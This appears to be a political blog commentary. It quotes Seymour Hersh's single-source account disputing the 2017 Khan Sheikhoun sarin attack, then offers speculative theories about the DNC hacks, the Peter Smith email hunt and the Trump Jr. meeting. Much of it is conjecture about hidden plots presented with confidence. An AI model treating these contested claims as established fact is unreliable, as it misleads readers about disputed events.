The Execute Order governing U.S. military operations in theater, which was issued by the Chairman of the Joint Chiefs of Staff, provides instructions that demarcate the relationship between the American and Russian forces operating in Syria. “It’s like an ops order – ‘Here’s what you are authorized to do,’” the adviser said. “We do not share operational control with the Russians. We don’t do combined operations with them, or activities directly in support of one of their operations. But coordination is permitted. We keep each other apprised of what’s happening and within this package is the mutual exchange of intelligence. If we get a hot tip that could help the Russians do their mission, that’s coordination; and the Russians do the same for us. When we get a hot tip about a command and control facility,” the adviser added, referring to the target in Khan Sheikhoun, “we do what we can to help them act on it.” “This was not a chemical weapons strike,” the adviser said. “That’s a fairy tale. If so, everyone involved in transferring, loading and arming the weapon – you’ve got to make it appear like a regular 500-pound conventional bomb – would be wearing Hazmat protective clothing in case of a leak. There would be very little chance of survival without such gear. Military grade sarin includes additives designed to increase toxicity and lethality. Every batch that comes out is maximized for death. That is why it is made. It is odorless and invisible and death can come within a minute. No cloud. Why produce a weapon that people can run away from?”
The target was struck at 6:55 a.m. on April 4, just before midnight in Washington. A Bomb Damage Assessment (BDA) by the U.S. military later determined that the heat and force of the 500-pound Syrian bomb triggered a series of secondary explosions that could have generated a huge toxic cloud that began to spread over the town, formed by the release of the fertilizers, disinfectants and other goods stored in the basement, its effect magnified by the dense morning air, which trapped the fumes close to the ground. According to intelligence estimates, the senior adviser said, the strike itself killed up to four jihadist leaders, and an unknown number of drivers and security aides. There is no confirmed count of the number of civilians killed by the poisonous gases that were released by the secondary explosions, although opposition activists reported that there were more than 80 dead, and outlets such as CNN have put the figure as high as 92. A team from Médecins Sans Frontières, treating victims from Khan Sheikhoun at a clinic 60 miles to the north, reported that “eight patients showed symptoms – including constricted pupils, muscle spasms and involuntary defecation – which are consistent with exposure to a neurotoxic agent such as sarin gas or similar compounds.” MSF also visited other hospitals that had received victims and found that patients there “smelled of bleach, suggesting that they had been exposed to chlorine.” In other words, evidence suggested that there was more than one chemical responsible for the symptoms observed, which would not have been the case if the Syrian Air Force – as opposition activists insisted – had dropped a sarin bomb, which has no percussive or ignition power to trigger secondary explosions. The range of symptoms is, however, consistent with the release of a mixture of chemicals, including chlorine and the organophosphates used in many fertilizers, which can cause neurotoxic effects similar to those of sarin.
The internet swung into action within hours, and gruesome photographs of the victims flooded television networks and YouTube. U.S. intelligence was tasked with establishing what had happened. Among the pieces of information received was an intercept of Syrian communications collected before the attack by an allied nation. The intercept, which had a particularly strong effect on some of Trump’s aides, did not mention nerve gas or sarin, but it did quote a Syrian general discussing a “special” weapon and the need for a highly skilled pilot to man the attack plane. The reference, as those in the American intelligence community understood, and many of the inexperienced aides and family members close to Trump may not have, was to a Russian-supplied bomb with its built-in guidance system. “If you’ve already decided it was a gas attack, you will then inevitably read the talk about a special weapon as involving a sarin bomb,” the adviser said. “Did the Syrians plan the attack on Khan Sheikhoun? Absolutely. Do we have intercepts to prove it? Absolutely. Did they plan to use sarin? No. But the president did not say: ‘We have a problem and let’s look into it.’ He wanted to bomb the shit out of Syria.”
At the UN the next day, Ambassador Haley created a media sensation when she displayed photographs of the dead and accused Russia of being complicit. “How many more children have to die before Russia cares?” she asked. NBC News, in a typical report that day, quoted American officials as confirming that nerve gas had been used and Haley tied the attack directly to Syrian President Assad. “We know that yesterday’s attack was a new low even for the barbaric Assad regime,” she said. There was irony in America’s rush to blame Syria and criticize Russia for its support of Syria’s denial of any use of gas in Khan Sheikhoun, as Ambassador Haley and others in Washington did. “What doesn’t occur to most Americans,” the adviser said, “is if there had been a Syrian nerve gas attack authorized by Bashar, the Russians would be 10 times as upset as anyone in the West. Russia’s strategy against ISIS, which involves getting American cooperation, would have been destroyed and Bashar would be responsible for pissing off Russia, with unknown consequences for him. Bashar would do that? When he’s on the verge of winning the war? Are you kidding me?”
Trump, a constant watcher of television news, said, while King Abdullah of Jordan was sitting next to him in the Oval Office, that what had happened was “horrible, horrible” and a “terrible affront to humanity.” Asked if his administration would change its policy toward the Assad government, he said: “You will see.” He gave a hint of the response to come at the subsequent news conference with King Abdullah: “When you kill innocent children, innocent babies – babies, little babies – with a chemical gas that is so lethal … that crosses many, many lines, beyond a red line. … That attack on children yesterday had a big impact on me. Big impact … It’s very, very possible … that my attitude toward Syria and Assad has changed very much.”
Within hours of viewing the photos, the adviser said, Trump instructed the national defense apparatus to plan for retaliation against Syria. “He did this before he talked to anybody about it. The planners then asked the CIA and DIA if there was any evidence that Syria had sarin stored at a nearby airport or somewhere in the area. Their military had to have it somewhere in the area in order to bomb with it.” “The answer was, ‘We have no evidence that Syria had sarin or used it,’” the adviser said. “The CIA also told them that there was no residual delivery for sarin at Sheyrat [the airfield from which the Syrian SU-24 bombers had taken off on April 4] and Assad had no motive to commit political suicide.”
Everyone involved, except perhaps the president, also understood that a highly skilled United Nations team had spent more than a year in the aftermath of an alleged sarin attack in 2013 by Syria, removing what was said to be all chemical weapons from a dozen Syrian chemical weapons depots.
At this point, the adviser said, the president’s national security planners were more than a little rattled: “No one knew the provenance of the photographs. We didn’t know who the children were or how they got hurt. Sarin actually is very easy to detect because it penetrates paint, and all one would have to do is get a paint sample. We knew there was a cloud and we knew it hurt people. But you cannot jump from there to certainty that Assad had hidden sarin from the UN because he wanted to use it in Khan Sheikhoun.” The intelligence made clear that a Syrian Air Force SU-24 fighter bomber had used a conventional weapon to hit its target: There had been no chemical warhead. And yet it was impossible for the experts to persuade the president of this once he had made up his mind. “The president saw the photographs of poisoned little girls and said it was an Assad atrocity,” the senior adviser said. “It’s typical of human nature. You jump to the conclusion you want. Intelligence analysts do not argue with a president. They’re not going to tell the president, ‘if you interpret the data this way, I quit.’”
The national security advisers understood their dilemma: Trump wanted to respond to the affront to humanity committed by Syria and he did not want to be dissuaded. They were dealing with a man they considered to be not unkind and not stupid, but his limitations when it came to national security decisions were severe. “Everyone close to him knows his proclivity for acting precipitously when he does not know the facts,” the adviser said. “He doesn’t read anything and has no real historical knowledge. He wants verbal briefings and photographs. He’s a risk-taker. He can accept the consequences of a bad decision in the business world; he will just lose money. But in our world, lives will be lost and there will be long-term damage to our national security if he guesses wrong. He was told we did not have evidence of Syrian involvement and yet Trump says: ‘Do it.’”
On April 6, Trump convened a meeting of national security officials at his Mar-a-Lago resort in Florida. The meeting was not to decide what to do, but how best to do it – or, as some wanted, how to do the least and keep Trump happy. “The boss knew before the meeting that they didn’t have the intelligence, but that was not the issue,” the adviser said. “The meeting was about, ‘Here’s what I’m going to do,’ and then he gets the options.”
The available intelligence was not relevant. The most experienced man at the table was Secretary of Defense James Mattis, a retired Marine Corps general who had the president’s respect and understood, perhaps, how quickly that could evaporate. Mike Pompeo, the CIA director whose agency had consistently reported that it had no evidence of a Syrian chemical bomb, was not present. Secretary of State Tillerson was admired on the inside for his willingness to work long hours and his avid reading of diplomatic cables and reports, but he knew little about waging war and the management of a bombing raid. Those present were in a bind, the adviser said. “The president was emotionally energized by the disaster and he wanted options.” He got four of them, in order of extremity. Option one was to do nothing. All involved, the adviser said, understood that was a non-starter. Option two was a slap on the wrist: to bomb an airfield in Syria, but only after alerting the Russians and, through them, the Syrians, to avoid too many casualties. A few of the planners called this the “gorilla option”: America would glower and beat its chest to provoke fear and demonstrate resolve, but cause little significant damage. The third option was to adopt the strike package that had been presented to Obama in 2013, and which he ultimately chose not to pursue. The plan called for the massive bombing of the main Syrian airfields and command and control centers using B1 and B52 aircraft launched from their bases in the U.S. Option four was “decapitation”: to remove Assad by bombing his palace in Damascus, as well as his command and control network and all of the underground bunkers he could possibly retreat to in a crisis.
“Trump ruled out option one off the bat,” the senior adviser said, and the assassination of Assad was never considered. “But he said, in essence: ‘You’re the military and I want military action.’” The president was also initially opposed to the idea of giving the Russians advance warning before the strike, but reluctantly accepted it. “We gave him the Goldilocks option – not too hot, not too cold, but just right.” The discussion had its bizarre moments. Tillerson wondered at the Mar-a-Lago meeting why the president could not simply call in the B52 bombers and pulverize the air base. He was told that B52s were very vulnerable to surface-to-air missiles (SAMs) in the area and using such planes would require suppression fire that could kill some Russian defenders. “What is that?” Tillerson asked. Well, sir, he was told, that means we would have to destroy the upgraded SAM sites along the B52 flight path, and those are manned by Russians, and we possibly would be confronted with a much more difficult situation. “The lesson here was: Thank God for the military men at the meeting,” the adviser said. “They did the best they could when confronted with a decision that had already been made.”
Fifty-nine Tomahawk missiles were fired from two U.S. Navy destroyers on duty in the Mediterranean, the Ross and the Porter, at Shayrat Air Base near the government-controlled city of Homs. The strike was as successful as hoped, in terms of doing minimal damage. The missiles have a light payload – roughly 220 pounds of HBX, the military’s modern version of TNT. The airfield’s gasoline storage tanks, a primary target, were pulverized, the senior adviser said, triggering a huge fire and clouds of smoke that interfered with the guidance system of following missiles. As many as 24 missiles missed their targets and only a few of the Tomahawks actually penetrated into hangars, destroying nine Syrian aircraft, many fewer than claimed by the Trump administration. I was told that none of the nine was operational: such damaged aircraft are what the Air Force calls hangar queens. “They were sacrificial lambs,” the senior adviser said. Most of the important personnel and operational fighter planes had been flown to nearby bases hours before the raid began. The two runways and parking places for aircraft, which had also been targeted, were repaired and back in operation within eight hours or so. All in all, it was little more than an expensive fireworks display.
“It was a totally Trump show from beginning to end,” the senior adviser said. “A few of the president’s senior national security advisers viewed the mission as a minimized bad presidential decision, and one that they had an obligation to carry out. But I don’t think our national security people are going to allow themselves to be hustled into a bad decision again. If Trump had gone for option three, there might have been some immediate resignations.”
After the meeting, with the Tomahawks on their way, Trump spoke to the nation from Mar-a-Lago, and accused Assad of using nerve gas to choke out “the lives of helpless men, women and children. It was a slow and brutal death for so many … No child of God should ever suffer such horror.” The next few days were his most successful as president. America rallied around its commander in chief, as it always does in times of war. Trump, who had campaigned as someone who advocated making peace with Assad, was bombing Syria 11 weeks after taking office, and was hailed for doing so by Republicans, Democrats and the media alike. One prominent TV anchorman, Brian Williams of MSNBC, used the word “beautiful” to describe the images of the Tomahawks being launched at sea. Speaking on CNN, Fareed Zakaria said: “I think Donald Trump became president of the United States.” A review of the top 100 American newspapers showed that 39 of them published editorials supporting the bombing in its aftermath, including the New York Times, Washington Post and Wall Street Journal.
Five days later, the Trump administration gathered the national media for a background briefing on the Syrian operation that was conducted by a senior White House official who was not to be identified. The gist of the briefing was that Russia’s heated and persistent denial of any sarin use in the Khan Sheikhoun bombing was a lie because President Trump had said sarin had been used. That assertion, which was not challenged or disputed by any of the reporters present, became the basis for a series of further criticisms:
– The continued lying by the Trump administration about Syria’s use of sarin led to widespread belief in the American media and public that Russia had chosen to be involved in a corrupt disinformation and cover-up campaign on the part of Syria.
– Russia’s military forces had been co-located with Syria’s at the Shayrat airfield (as they are throughout Syria), raising the possibility that Russia had advance notice of Syria’s determination to use sarin at Khan Sheikhoun and did nothing to stop it.
– Syria’s use of sarin and Russia’s defense of that use strongly suggested that Syria withheld stocks of the nerve agent from the UN disarmament team that spent much of 2014 inspecting and removing all declared chemical warfare agents from 12 Syrian chemical weapons depots, pursuant to the agreement worked out by the Obama administration and Russia after Syria’s alleged, but still unproven, use of sarin the year before against a rebel redoubt in a suburb of Damascus.
The briefer, to his credit, was careful to use the words “think,” “suggest” and “believe” at least 10 times during the 30-minute event. But he also said that his briefing was based on data that had been declassified by “our colleagues in the intelligence community.” What the briefer did not say, and may not have known, was that much of the classified information in the community made the point that Syria had not used sarin in the April 4 bombing attack.
…
The crisis slid into the background by the end of April, as Russia, Syria and the United States remained focused on annihilating ISIS and the militias of al-Qaida. Some of those who had worked through the crisis, however, were left with lingering concerns. “The Salafists and jihadists got everything they wanted out of their hyped-up Syrian nerve gas ploy,” the senior adviser to the U.S. intelligence community told me, referring to the flare-up of tensions between Syria, Russia and America. “The issue is, what if there’s another false flag sarin attack credited to hated Syria? Trump has upped the ante and painted himself into a corner with his decision to bomb. And do not think these guys are not planning the next faked attack. Trump will have no choice but to bomb again, and harder. He’s incapable of saying he made a mistake.”
———-
9. That’s ominous: So you know that potential bombshell report by Sy Hersh in Die Welt about how Donald Trump’s intelligence and military advisors have concluded that Bashar Assad’s regime was not in fact responsible for a sarin gas attack, but instead the cloud of chemicals was a consequence of secondary explosions of stored chlorine and fertilizer in a building bombed by the Syrian air force? That report that has been almost entirely ignored by American news outlets? Well, it’s going to be a lot harder to ignore that report now that the White House just issued an ominous message indicating it has evidence that Assad’s forces were planning a chemical attack, and if that happens the consequences will be severe and Russia and Iran will be held responsible:
The White House issued an ominous warning to Syrian President Bashar al-Assad on Monday night, pledging that his regime would pay a “heavy price” if it carried out another chemical attack this year.
In a statement, White House press secretary Sean Spicer said that the United States had detected evidence of preparations for a chemical attack, similar to the preparations that occurred before an attack in April.
“The United States has identified potential preparations for another chemical weapons attack by the Assad regime that would likely result in the mass murder of civilians, including innocent children,” Spicer said in the statement. “The activities are similar to preparations the regime made before its April 4, 2017 chemical weapons attack.
“As we have previously stated, the United States is in Syria to eliminate the Islamic State of Iraq and Syria,” he continued. “If, however, Mr. Assad conducts another mass murder attack using chemical weapons, he and his military will pay a heavy price.”
Following the April attack, President Trump ordered an air strike against the Assad-controlled air field where the attack was believed to have been carried out.
At the time, Trump said that Assad’s use of chemical weapons against innocent women and children made action inevitable.
“When you kill innocent children, innocent babies, babies, little babies, with a chemical gas that is so lethal — people were shocked to hear what gas it was,” Trump said after the attack. “That crosses many, many lines, beyond a red line, many, many lines.”
Following Spicer’s statement on Monday night, Nikki Haley, the U.S. Ambassador to the United Nations said Assad and its allies would be squarely blamed if such an attack occurred.
“Any further attacks done to the people of Syria will be blamed on Assad, but also on Russia & Iran who support him killing his own people,” Haley wrote.
Any further attacks done to the people of Syria will be blamed on Assad, but also on Russia & Iran who support him killing his own people.— Nikki Haley (@nikkihaley) June 27, 2017
The U.S. military maintains a variety of weapons in the region that could be used in the event of another strike, including manned and unmanned aircraft in several Middle Eastern countries. But the most likely scenario is probably a strike using naval assets, which can be launched with fewer diplomatic issues than using bases in allied countries such as Turkey or the United Arab Emirates.
The Navy launched Tomahawk missiles at a Syrian military airfield April 6 in response to a previous alleged chemical weapons attack, using two guided-missile destroyers in the eastern Mediterranean Sea, the USS Ross and USS Porter, to do so.
…
A point of contention for the Pentagon after the last strike was the Syrian regime’s alleged use of a nerve agent, like sarin. It is far deadlier than some other chemicals that U.S. military and intelligence officials say that the regime has used, such as chlorine.
———-
““The United States has identified potential preparations for another chemical weapons attack by the Assad regime that would likely result in the mass murder of civilians, including innocent children,” Spicer said in the statement. “The activities are similar to preparations the regime made before its April 4, 2017 chemical weapons attack.””
That was the message from Sean Spicer, followed by this warning to Iran and Russia from UN Ambassador Nikki Haley:
…
Following Spicer’s statement on Monday night, Nikki Haley, the U.S. Ambassador to the United Nations said Assad and its allies would be squarely blamed if such an attack occurred.
“Any further attacks done to the people of Syria will be blamed on Assad, but also on Russia & Iran who support him killing his own people,” Haley wrote.
…
The Office of the Director of National Intelligence had a rather curious response to a Freedom of Information Act lawsuit demanding the release of the classified report given to President Obama back in January purporting to show the Russian government was behind the hacks. That the ODNI doesn’t want to release this document isn’t particularly curious. That’s to be expected. It’s the explanation from the ODNI for why they can’t release the document that’s curious. According to the ODNI, the requested document would present a risk to human intelligence sources by revealing the comparative weight given to human vs technical evidence, risking US sources and methods. But the ODNI went further, suggesting that even releasing a fully redacted document would present similar risks. So who knows what’s in that ODNI report, but it’s apparently so damn sensitive that the release of a fully redacted version of it presents a national security risk:
““Release of a redacted report would be of particular assistance to Russian intelligence, which, armed with both the declassified report and a redacted copy of the classified report, would be able to discern the volume of intelligence the U.S. currently possesses with respect to Russian attempts to influence the 2016 election,” Deputy Director of National Intelligence for Intelligence Integration Edward Gistaro wrote.””
Revealing the volume of the report alone is apparently problematic. So the requested report is presumably either surprisingly long or surprisingly short. The length of the report is revealing of...something. And it would reveal top secret intelligence and put lives at risk even if the report was fully redacted:
““I agree with the [National Intelligence Council] that a heavily or even fully redacted version of the classified report can not be publicly released without jeopardizing national security information properly classified as SECRET or TOP SECRET,” he wrote.””
What is it about this report’s volume that’s so dangerous to reveal? We don’t get to know. But note the kind of information that EPIC was trying to get from its lawsuit and which was largely left out of the released unclassified version: technical evidence:
So it’s probably worth noting that the big piece in the Washington Post describing the behind-the-scenes decision-making in the Obama administration over how to respond to the hacks and the risk of more cyberattacks mentions the critical sources of intelligence that the US relied on in coming to its conclusion that the Russian government was behind the hacks. There was critical human intelligence that apparently came from a source deep inside the Kremlin, and critical technical evidence from a foreign ally. And there was something about that ally that made the NSA not trust that evidence initially. So the refusal to even release a fully redacted version of that report over fears of revealing sources and methods is pretty odd, since there have already been some significant details revealed in the media about those sources and methods. Details like a source deep inside the Kremlin:
“Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.”
So based on the Washington Post report we’re told that some of the most critical technical evidence came from a rather iffy source. And based on the ODNI’s explanation for why it can’t release even a fully redacted version of that report, it’s because doing so could reveal the relative weight the US applied to human vs technical evidence in coming to its assessment. It raises the possibility of the technical evidence playing a surprisingly small role, which in turn raises the question of just how much the final conclusion was based on the Kremlin source alone.
And given the possibility that human intelligence played an overwhelming role in the US reaching the conclusion it made, it’s increasingly important to keep in mind one of the more amazing revelations in how this investigation unfolded: the discovery that someone passed the FBI Russian intelligence documents in March of 2016 claiming that the Russians had the hacked DNC emails. And that alleged Russian intelligence document turned out to contain disinformation. The source was unable to provide any of the emails the document claimed the Russians had, and the FBI was unable to corroborate other intelligence provided by this same source. So it’s already been reported that someone, presumably someone with access to Russian intelligence, was feeding the US government disinformation about Russian involvement in the hack:
“After the bureau first received the document, it attempted to use the source to obtain the referenced email but could not do so, these people said. The source that provided the document, they said, had previously supplied other information that the FBI was also unable to corroborate.”
That doesn’t sound like a very good source. But they were definitely good at making an impact despite raising a number of doubts:
Adding to the mystery, note the timing of the FBI receiving this document: early March of 2016:
Keep in mind that the FBI first casually notified the DNC of the detected hacking back in the fall of 2015 and the hacks weren’t publicly reported on until mid June of 2016. So this Russian intelligence document arrived in the FBI’s hands at a time when the US government, and presumably allied governments, knew about the ongoing hacking of the DNC, but the public at large didn’t know. So someone who can claim to have access to Russian intelligence documents passed along an intelligence document that implicated the Russian government in the hacks months before the public phase of the hacking fiasco ever got started. And that intelligence contained disinformation seemingly intended to sow fears in the US government that the Russians would dump this alleged email to the public, damaging public perception of the investigations into Hillary’s private email by showing collusion between the Attorney General and Hillary. And these fears apparently catalyzed James Comey’s decision to give that press conference on June 8th. A press conference that took place a week before the initial news reports that the DNC was hacked and a month and a half before the initial release by Wikileaks of the hacked emails in late July. It’s all pretty puzzling.
So is the “deep in the Kremlin” source who claimed Putin ordered the hacking the same source of this bogus Russian intelligence document? Did the document even come from someone in the Russian government or did it come from a rival intelligence service? And if it did come from a rival intelligence service, is this the same foreign ally who provided the critical technical evidence that the NSA didn’t place much faith in or was that a different foreign ally?
There’s no shortage of questions raised by all this. Too bad the ODNI won’t release that classified report. Apparently it would have provided a lot of answers. Fully redacted or not.
Another day, another massive revelation in the #TrumpRussia story: The Wall Street Journal just put out a pair of stories about what appears to be an operation involving senior figures in the Trump campaign (Steve Bannon, Kellyanne Conway, Sam Clovis, and Michael Flynn) to seek out and obtain what they hoped were hacked emails from Hillary Clinton’s email server that they apparently believed were being provided by Russian hackers probably associated with the Russian government. This all apparently was arranged shortly after Trump made his infamous call for Russia to hack Hillary’s emails, and the person leading the operation is the one who went to the Wall Street Journal to tell everyone about it. Yep.
So who is this gadfly who led what was purportedly one of the most sensitive political dirty tricks operations in decades and just couldn’t help blabbing about it to the Wall Street Journal (a Murdoch family owned publication)? Peter Smith, an 81 year old long-time conservative activist better known for his work in the ’90s financing anti-Clinton conspiracy theories and scandals like “Troopergate”. For some reason he decided to tell all this to the Wall Street Journal back in May, and then he died a week and a half later. Smith talks about how he was in contact with 5 different hackers claiming to have Hillary Clinton’s hacked emails, two of which he believed were Russian hackers that he assumed were working for the Russian government, and how Smith’s team was never able to verify whether any of the emails provided by these hackers were real. And Smith decided to tell the world about it for some really mysterious reason.
But Smith isn’t the only source in this story. Matt Tait, a former GCHQ cyber analyst who writes under the pseudonym PwnAllTheThings (and not the British ‘Alt-Right’ figure of the same name), claims to have been contacted by Smith to provide his expertise on whether or not the allegedly hacked emails were real. Tait claims he was contacted around the time Trump made his call for Russia to hack Hillary and says he initially thought Smith wanted him to provide his analysis on the DNC email hack that Tait had already written about. It was only later, after some phone interviews with Smith and some others, that Smith disclosed that he was putting together a group to try to track down and validate Hillary’s emails that Smith believed were likely available via hackers on the dark web. Tait says he grew uncomfortable with the operation in mid September, refused to sign a non-disclosure agreement, and parted ways with Smith’s operation.
It’s also important to note that Tait was a figure who was initially quite skeptical of Crowdstrike’s analysis that the DNC hacks were an act of the Russian government, but later came around to that conclusion. Why? Because of things like the meta-data in the leaked documents like the “Iron Felix” name. And Tait also felt that Guccifer’s behavior wasn’t self-aggrandizing enough to be consistent with a lone hacker. Also the command and control server used by the hackers coincided with the command and control server used in the 2015 Bundestag hacks (don’t forget the IP addresses were inexplicably hard coded into the malware). Based on this shoddy “Hi! I’m a Russian hacker!” evidence, Tait concluded in a July 28th blog post that the DNC hacks had indeed been the work of Russian government agents, and he made this argument in a blog post a day after Trump made his call for the Russians to hack Hillary on July 27th. So when Smith’s group approached Tait, Tait had already made it publicly clear that he was ready and willing to go along with the developing narrative of Russian government hackers that was predicated on the assumption that these were really horrible Russian government hackers.
Tait responded to the WSJ article with a long post on his blog where he lays out the personal experiences explaining why he went along with the operations for as long as he did, why he left it, and why he was pretty sure Smith wasn’t just engaging in name-dropping and puffery when he claimed to be working with a larger team that included figures like Bannon and Conway, recounting the number of details Smith would provide to Tait about the inner workings of the Trump campaign.
Also, critically, Tait notes that he never saw any of the emails allegedly provided to Smith by the hackers they contacted on the dark web.
But the revelations weren’t limited to the pair of WSJ reports or Tait’s own account. It also mentions how US investigators are looking into intelligence reports about apparent Russian hackers who were observed discussing how they could hack Hillary’s emails and then get them to Michael Flynn through an intermediary.
So at that point it looks like a long-time GOP anti-Clinton dirty tricks operative decided to promote a particular narrative about the Trump team’s role in the hackings that implicates Michael Flynn, Steven Bannon, and Kellyanne Conway in an operation that involved getting hacked emails but simultaneously promotes the notion that it was Russian government hackers (and not, you know, people hired by the Trump team leaving tons of “Hi! I’m a Russian hacker!” fingerprints). He decided to do this almost two months ago, and it’s just coming out now. It’s kind of hard to take it all at face value but it’s a pretty good attempt at a limited hangout intended to push Trump aside and make way for a non-openly crazy GOPer to replace him:
“The GOP operative in question is Peter W. Smith, who told the Journal during an interview last month that he began shopping around for the some 33,000 deleted Clinton emails in early September 2016, two months before Election Day. Smith’s efforts came in the wake of the WikiLeaks release of hacked Democratic National Committee emails that July and a month before the organization’s release of emails hacked from Clinton campaign chairman John Podesta in October. “Mr. Smith, a private-equity executive from Chicago active in Republican politics, said he assembled a group of technology experts, lawyers and a Russian-speaking investigator based in Europe to acquire emails the group theorized might have been stolen from the private server Mrs. Clinton used as secretary of state,” according to the WSJ.”
A whole team was assembled to obtain hacked emails from what they say they assumed were Russian hackers right at the height of a campaign that had Russian government hacking at the center of it. With Trump team people helping to coordinate it. That’s the story. The story taken to a major newspaper and sat on for two months:
And in this story we learn about how investigators are working with intelligence agencies describing “Russian hackers” discussing how to hack Hillary’s emails and get them to Flynn, taking place during the same period that Smith’s group was operating:
So that was the first WSJ report. It didn’t mention Smith’s connection to anyone on the Trump campaign other than Michael Flynn. It was the second WSJ report that drew in the rest of those senior Trump officials. And former GCHQ analyst Matt Tait, who appears to be the source for much of this information:
“Officials identified in the document include Steve Bannon, now chief strategist for President Donald Trump; Kellyanne Conway, former campaign manager and now White House counselor; Sam Clovis, a policy adviser to the Trump campaign and now a senior adviser at the Agriculture Department; and retired Lt. Gen. Mike Flynn, who was a campaign adviser and briefly was national security adviser in the Trump administration.”
Yep, senior Trump officials were identified in a document describing a corporation set up to obtain these emails. And according to Tait’s own blog posting, this corporation was set up in Delaware to avoid campaign disclosure laws (it’s a reminder that this story is another reason to revisit campaign finance laws):
So as Josh Marshall reasonably concludes, it looks like Tait is the source for much of the information in this second WSJ article. Tait’s own blog posting that popped up shortly after the article certainly supports that theory:
And in that blog post we find Tait describing an experience where Smith was openly sharing with him all sorts of rather amazing campaign gossip, like campaign infighting, doubts about Trump from his own staff, and Michael Flynn’s own ambitions to become head of the CIA or National Security Advisor. And this is all happening:
while Tait describes himself as basically an outsider, and not a particularly anti-Hillary outsider, who was invited into this cabal of GOP operatives and Trump team officials:
“By the middle of September, all contact between us ended. By this time, I had grown extremely uncomfortable with the situation, so when Smith and his colleague asked me to sign a non-disclosure agreement, I declined to do so. My suspicion was that the real purpose of the non-disclosure agreement was to retrospectively apply confidentiality to the conversations we had already had before that point. I refused to sign the non-disclosure and we went our separate ways.”
So after Tait, someone with no obvious outside connections to the Trump campaign, gets invited into this amazingly scandalous operation, and Peter Smith shares all these details about the Trump campaign’s inner workings with Tait but also shares with Tait how the Trump team claims to think it was dealing with Russian government hackers, only later does Smith try to get a non-disclosure agreement from Tait. It’s the latest indication that, if this whole narrative is real, this entire ‘op’ has got to be one of the worst in history from an operational security standpoint. The hacks by the ‘Russian hackers’ were a bad joke, and now we’re told the Trump team senior officials were involved in a corporation set up to obtain this hacked material from people they assumed were Russian government hackers. And they shared all this with an apparent outsider who was former GCHQ. Before asking him to sign a non-disclosure agreement.
While it’s kind of a joke operation if they were truly trying to get these allegedly hacked Hillary emails into the public domain without the Trump team getting charged with colluding with the Russian government, if it was an operation set up to potentially get discovered later for the purpose of reinforcing the narrative that it was definitely Russian government hackers behind the DNC/Podesta hacks, and definitely not someone involved with the Trump team, then it kind of makes sense. Potentially discovered later. Like, if Trump lost and there were all sorts of investigations into Trump team activities or if Trump won and turned out to be an unhinged lunatic. A pre-planted limited hangout. Is that possible? Well, again, note one of the reasons Smith would have potentially found Tait a useful person to bring on board with this operation if the goal was establishing that narrative: Tait was more than happy to back up Crowdstrike’s shoddy analysis:
Tait came around to Crowdstrike’s “Russian government hackers did it” view based on some pretty questionable analysis.
Beyond that, it’s hard to ignore the fact that two of the senior Trump officials, Kellyanne Conway and Steve Bannon, joined the Trump team from the Robert Mercer/Cambridge Analytica crew. It was a package deal. And as we’ve learned now about Cambridge Analytica, it’s got deep ties to conservative elements of the British intelligence community.
So, first off, you have to wonder if Tait was recommended to the Trump team through someone tied to Cambridge Analytica. But beyond that, given that this story has become public at all, you have to wonder if this isn’t part of the Mercer crew basically pulling the lever and dumping Trump. It’s not like Trump hasn’t been a disaster when it comes to selling the American public on the Mercer/Koch pro-oligarch policy agenda. And there’s no sign he’s going to get less unhinged the more time he spends in office. Could we be seeing the first major limited hangout intended to take down Trump while maintaining the “Russian government hacker” narrative? Sure, there’s also the revelation of intelligence reports of Russian hackers discussing how to get into Hillary’s server and get the info to Flynn, but until we get more information on the nature of that intelligence it’s hard to put too much weight on it.
So, since Peter Smith is behaving like a GOPer trying to get Trump removed to make way for President Pence (or Ryan), it’s worth noting that one of the best forms of revenge for Trump would be to take the rest of the GOP down with him. After all, isn’t that what Trump’s base voted for? Burning down the oligarch-wing of the party to implement an agenda for the little guy? And what better way for Trump to burn down the party than to admit to knowing his team was arranging for the hacks and that the rest of the senior GOP leadership was in on it or at least knew about it and worked to cover it up (until they decided to dump Trump). That’s assuming such evidence exists, but if it does, and Trump reveals it, he’ll probably be one of the most popular politicians in GOP history. Hopefully someone makes it clear to Trump that this is an option. And makes it clear to him soon. At this point, what does he have to lose?
Sure, there’s probably plenty of blackmail material on him, but if Trump brings down the GOP big wigs, no one is going to care about all that blackmail material. Trump might be a far-right fascist nut job, but he’s just one. There’s a whole global network. And now, thanks to things like the 2016 hack attacks, Trump is in a position to do incredible damage to that global fascist network that appears to be turning on him and hanging him out to dry. Is he going to just take that? Isn’t he supposed to be a counter-puncher? Well, it looks like he’s getting punched big time. By his own team. Ouch.
The #TrumpRussian story got a jolt of adrenaline over the weekend following a series of stories discussing a meeting that took place on June 9th, 2016, attended by Donald Trump Jr., Paul Manafort, and Jared Kushner after they were invited to meet with a Kremlin-linked attorney. What did they talk about? Well, according to the initial report, it was just a meeting about policies impacting child adoptions and a lobbying effort to reverse the Magnitsky Act. And the fact that this meeting took place is openly acknowledged by Trump Jr. and Kushner:
“Representatives of Donald Trump Jr. and Mr. Kushner confirmed the meeting after The Times approached them with information about it. In a statement, Donald Jr. described the meeting as primarily about an adoption program. The statement did not address whether the presidential campaign was discussed.”
As we can see, the ‘fake news’ charge isn’t going to work for this story. Jared Kushner and Trump Jr. both confirmed it. And the whole meeting was first disclosed after Kushner amended his security clearance disclosure forms:
But that doesn’t mean there wasn’t anything ‘fake’ in this report. Because as we learned the next day, the Trump team’s depiction of the purpose of this meeting as being focused on adoption policies was pretty fake. Or at least included a giant omission: It turns out Trump Jr. was invited to the meeting after being told that he was going to be given damaging information on Hillary Clinton. No such information was ever given, we are told.
But still, we now have reports that Trump Jr., Kushner, and Manafort attended a June 9th meeting with a Kremlin-linked lawyer and they showed up at this meeting expecting to receive damaging information on Hillary Clinton. And once again, the report is backed up by Donald Trump, Jr.’s own statements. He’s taking an ‘of course I would attend such a meeting! who wouldn’t?!’ approach to it all and spinning the offer of damaging info on Hillary as just a ruse intended to get the Trump team’s ear so they could be lobbied about child adoption policies. And, yes, that’s an incredibly absurd and cynical way to spin it, but that’s actually Trump, Jr.’s spin: we tried to get the damaging Hillary info from the Russians but it was all a ruse. So no harm, no foul. And anyone else would have done the same!
““No details or supporting information was provided or even offered. It quickly became clear that she had no meaningful information,” he said, saying he concluded that claims of helpful information for the campaign had been a “pretext” for setting up the meeting”
Poor Don Jr. He thought he was going to get some ‘helpful information’ but it just turned out to be lure to set him up for a lobbying pitch. Uh huh.
